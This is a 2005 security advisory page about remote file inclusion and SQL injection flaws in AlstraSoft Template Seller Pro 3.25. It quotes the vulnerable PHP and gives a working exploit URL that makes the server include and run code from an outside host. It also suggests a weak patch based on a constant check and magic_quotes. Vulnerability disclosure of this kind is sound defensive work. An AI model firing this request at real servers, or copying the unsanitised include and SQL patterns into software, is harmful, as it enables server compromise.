|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 189 CVE : CVE-2005-3797 CVE : CVE-2005-3798 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : Robin Verton Published : 16.11.2005
Advisory Content : AlstraSoft Template Seller Pro 3.25 =================================== Software: AlstraSoft Template Seller Pro 3.25 Severity: Arbitrary code execution, SQL Injection(s) Risk: High Author: Robin Verton <r.verton (at) gmail (dot) com [email concealed]> Date: Nov. 15 2005 Vendor: www.alstrasoft.com Description: Ever thought of starting your very own profitable shopping cart business just like TemplateMonster.com? With AlstraSoft Template Seller Pro software, you can run your own templates store selling templates such as website templates, logo templates, flash intro templates, frontpage templates and many more! The flexibility of Template Seller Pro software also allows you to run a membership based templates business just like BoxedArt.com by offering paid members multiple templates download instantly. [http://www.alstrasoft.com/] Details: 1) /include/paymentplugins/payment_paypal.php /** Paypal payment plugin */ global $config,$conn; include("$config[basepath]/include/payment/class.paypal_ipn.php"); include("$config[basepath]/include/paymentplugins/paymentplugin.php"); If register_globals is set on, we can include and execute any php code of our choice. This is very dangerous because if safe_mode is off and there are no restriction for execution commands an attacker can get access to each file on the server. http://www.example.com/include/paymentplugins/payment_paypal.php?config[ basepath]=http://youhost.com/our-code.txt? Because of the trailing '?' we pass the '/include/payment/class.paypal_ipn.php' from the include statement as a parameter to the our-code.php script so only the script we set in $config[basepath] is included. 2) /admin/index.php $sql_user_name = $user_name; $md5_pass = md5($user_pass); $sql = "SELECT * FROM UserDB WHERE user_name='$sql_user_name' and user_password='$md5_pass'"; The User submitted variable for the username is inserted into the database without andy validation. Because of this we can insert malicious code into the database. Nearly NO user-submitted variable is validated , so there are a few more SQL-injections possible. Patch: Insert constants and use the following code to prevent against such attacks if( !defined('IN_SYS') ) { die('Hacking Attempt!'); } and activate magic_quotes_gpc Credits: Credit goes to Robin Verton References: [1] http://www.alstrasoft.com/template.htm [2] http://myblog.it-security23.net  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |